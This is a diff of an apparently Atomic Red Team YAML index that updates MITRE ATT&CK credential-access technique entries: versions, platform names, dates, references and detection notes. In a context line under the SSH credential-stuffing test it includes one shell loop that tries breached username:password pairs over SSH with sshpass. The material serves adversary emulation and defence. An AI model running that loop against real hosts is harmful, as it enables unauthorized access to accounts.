-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
-      type: attack-pattern
-      created: '2020-02-11T18:43:06.253Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.006
-        url: https://attack.mitre.org/techniques/T1552/006
-      - source_name: Microsoft GPP 2016
-        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
-        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
-          March 9, 2020.
-      - url: https://msdn.microsoft.com/library/cc422924.aspx
-        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
-          11, 2018.
-        source_name: Microsoft GPP Key
-      - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
-        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
-          Retrieved April 11, 2018.
-        source_name: Obscuresecurity Get-GPPPassword
-      - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
-          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
-        url: https://adsecurity.org/?p=2288
-        source_name: ADSecurity Finding Passwords in SYSVOL
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-08-15T13:21:22.734Z'
       name: 'Unsecured Credentials: Group Policy Preferences'
       description: |
         Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -56080,25 +56806,54 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
         for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
         and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
         in SYSVOL)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+      created: '2020-02-11T18:43:06.253Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/006
+        external_id: T1552.006
+      - source_name: Obscuresecurity Get-GPPPassword
+        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+          Retrieved April 11, 2018.
+        url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+      - source_name: Microsoft GPP 2016
+        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+          March 9, 2020.
+        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+      - source_name: Microsoft GPP Key
+        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+          11, 2018.
+        url: https://msdn.microsoft.com/library/cc422924.aspx
+      - source_name: ADSecurity Finding Passwords in SYSVOL
+        description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+        url: https://adsecurity.org/?p=2288
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.006
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -56173,11 +56928,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1606:
     technique:
-      modified: '2023-10-15T11:10:03.428Z'
+      modified: '2024-10-15T15:58:23.638Z'
       name: Forge Web Credentials
       description: "Adversaries may forge credential materials that can be used to
         gain access to web applications or Internet services. Web applications and
@@ -56221,11 +56975,10 @@ credential-access:
       - Windows
       - macOS
       - Linux
-      - Azure AD
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -56249,8 +57002,8 @@ credential-access:
         url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
       - source_name: GitHub AWS-ADFS-Credential-Generator
         description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
-          Retrieved December 16, 2020.
-        url: https://github.com/damianh/aws-adfs-credential-generator
+          Retrieved September 27, 2024.
+        url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
@@ -56266,11 +57019,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1621:
     technique:
-      modified: '2024-04-19T04:26:29.365Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication Request Generation
       description: |-
         Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -56281,11 +57033,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
       - Pawel Partyka, Microsoft 365 Defender
       - Shanief Webb
       - Obsidian Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
         logs for suspicious events: unusual login attempt source location, mismatch
@@ -56295,16 +57049,16 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
       - IaaS
       - SaaS
-      - Azure AD
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -56342,13 +57096,10 @@ credential-access:
         url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.008:
     technique:
-      modified: '2023-04-11T00:34:00.779Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Chat Messages
       description: |-
         Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -56357,6 +57108,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Douglas Weir
       x_mitre_deprecated: false
@@ -56364,11 +57116,11 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -56386,13 +57138,10 @@ credential-access:
         url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1212:
     technique:
-      modified: '2023-10-15T11:45:21.555Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Exploitation for Credential Access
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
@@ -56405,6 +57154,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
       - Mohit Rathore
@@ -56418,12 +57168,13 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      - Azure AD
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Process: Process Creation'
@@ -56455,17 +57206,14 @@ credential-access:
         url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
       - source_name: Microsoft Midnight Blizzard Replay Attack
         description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
-          Retrieved September 27, 2023.
-        url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+          Retrieved September 12, 2024.
+        url: https://x.com/MsftSecIntel/status/1671579359994343425
       - source_name: Technet MS14-068
         description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
           Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
         url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -56538,12 +57286,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1110:
     technique:
-      modified: '2024-01-29T18:53:26.593Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Brute Force
       description: |-
         Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -56552,6 +57299,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - David Fiser, @anu4is, Trend Micro
       - Alfredo Oliveira, Trend Micro
@@ -56570,18 +57318,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
@@ -56605,13 +57353,10 @@ credential-access:
         url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.004:
     technique:
-      modified: '2024-03-07T14:28:02.910Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Credential Stuffing'
       description: |-
         Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -56637,6 +57382,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
@@ -56648,18 +57394,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'User Account: User Account Authentication'
@@ -56678,9 +57424,6 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.004
     atomic_tests:
     - name: SSH Credential Stuffing From Linux
@@ -56749,7 +57492,7 @@ credential-access:
           for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -56778,24 +57521,26 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -56830,13 +57575,10 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1187:
     technique:
-      modified: '2023-08-14T19:30:45.123Z'
+      modified: '2024-10-15T16:33:34.508Z'
       name: Forced Authentication
       description: |-
         Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -56914,14 +57656,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Server_Message_Block
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1187
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -56937,6 +57678,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -56945,13 +57687,13 @@ credential-access:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -56959,15 +57701,11 @@ credential-access:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -56978,9 +57716,8 @@ credential-access:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -57026,7 +57763,7 @@ credential-access:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -57045,17 +57782,16 @@ credential-access:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -57088,10 +57824,9 @@ credential-access:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -57128,11 +57863,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.006:
     technique:
-      modified: '2023-09-30T20:24:19.357Z'
+      modified: '2024-10-15T14:20:16.722Z'
       name: Cloud Secrets Management Stores
       description: "Adversaries may acquire credentials from cloud-native secret management
         solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -57200,34 +57934,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.008:
     technique:
-      x_mitre_platforms:
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
-      type: attack-pattern
-      created: '2020-02-11T18:46:56.263Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - url: https://attack.mitre.org/techniques/T1003/008
-        external_id: T1003.008
-        source_name: mitre-attack
-      - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
-          File Formats. Retrieved February 19, 2020.
-        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
-        source_name: Linux Password and Shadow File Formats
-      - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
-          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
-          2020.'
-        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-        source_name: nixCraft - John the Ripper
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-25T20:48:04.491Z'
       name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
       description: |
         Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -57236,20 +57946,42 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
         distributions, can be used to watch for hostile processes attempting to access
         <code>/etc/passwd</code> and <code>/etc/shadow</code>, alerting on the pid,
         process name, and arguments of such programs.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+      created: '2020-02-11T18:46:56.263Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/008
+        external_id: T1003.008
+      - source_name: Linux Password and Shadow File Formats
+        description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+          File Formats. Retrieved February 19, 2020.
+        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+      - source_name: nixCraft - John the Ripper
+        description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+          2020.'
+        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.008
     atomic_tests:
     - name: Access /etc/shadow (Local)
@@ -57383,7 +58115,7 @@ credential-access:
           from Memory. Retrieved October 11, 2019.
         url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
         source_name: Medium Detecting Attempts to Steal Passwords from Memory
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T21:46:46.831Z'
       name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
       description: |-
         Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -57409,13 +58141,11 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.002
     atomic_tests: []
   T1555.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:44:35.906Z'
       name: 'Credentials from Password Stores: Windows Credential Manager'
       description: |-
         Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -57432,24 +58162,24 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Bernaldo Penas Antelo
+      - Mugdha Peter Bansode
+      - Uriel Kosayev
+      - Vadim Khrykov
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)
 
         Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
 
         Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Bernaldo Penas Antelo
-      - Mugdha Peter Bansode
-      - Uriel Kosayev
-      - Vadim Khrykov
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -57490,36 +58220,13 @@ credential-access:
         url: https://www.passcape.com/windows_password_recovery_vault_explorer
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.004
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
